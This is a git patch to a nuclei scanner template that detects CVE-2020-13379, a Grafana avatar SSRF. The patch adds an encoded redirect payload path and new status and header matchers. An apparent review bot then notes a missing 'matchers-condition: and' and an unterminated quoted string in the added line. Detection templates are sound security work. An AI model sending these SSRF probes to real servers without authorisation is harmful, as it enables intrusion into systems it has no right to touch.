From 3da6c533f0704a439d7b06bfa5ede6035b55ad23 Mon Sep 17 00:00:00 2001
From: joeldeleep <42582155+joeldeleep@users.noreply.github.com>
Date: Sun, 27 Sep 2020 11:58:57 +0530
Subject: [PATCH] Update CVE-2020-13379.yaml

The old matching using status code 502 returned false positive when the endpoint is already having a bad gateway. Going through the report here https://hackerone.com/reports/878779 and video https://www.youtube.com/watch?v=NWHOmYbLrZ0 , the path has been rewritten and matched with respective image/jpeg as explained in the poc
---
 cves/CVE-2020-13379.yaml | 10 ++++++----
 1 file changed, 6 insertions(+), 4 deletions(-)

diff --git a/cves/CVE-2020-13379.yaml b/cves/CVE-2020-13379.yaml
index 264c5ece3e..a3fe08b031 100644
--- a/cves/CVE-2020-13379.yaml
+++ b/cves/CVE-2020-13379.yaml
@@ -13,10 +13,12 @@ info:
 requests:
 - method: GET
 path:
- - '{{BaseURL}}avatar/%7B%7Bprintf%20%22%25s%22%20%22this.Url%22%7D%7D'
- - '{{BaseURL}}/avatar/%7B%7Bprintf%20%22%25s%22%20%22this.Url%22%7D%7D'
- - "{{BaseURL}}/"
+ - '{{BaseURL}}/avatar/test%3fd%3dredirect.example.com%25253f%253b%252fbp.blogspot.com%252f
 matchers:
 - type: status
 status:
- - 502
+ - 200
+ - type: word
+ words:
+ - "image/jpeg"
+ part: header
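Review bot: The two entries under `matchers:` are not tied together by a `matchers-condition` in this hunk, and nuclei's default condition is `or`, so the new `status: 200` matcher fires on its own for any target that simply returns 200 and the template keeps producing the false positives this change is meant to remove; add `matchers-condition: and` next to `matchers:` so both the status and the `image/jpeg` header must match. The added path scalar also ends at `%252f` with no closing `'` as rendered here, which a YAML loader would reject as an unterminated single-quoted string — if that is not an artifact of how the patch was pasted, the line should end `%252f'`. The `requests:` item continues past the end of the hunk, so I am assuming no `matchers-condition` key is set further down; if one is, the first point is moot.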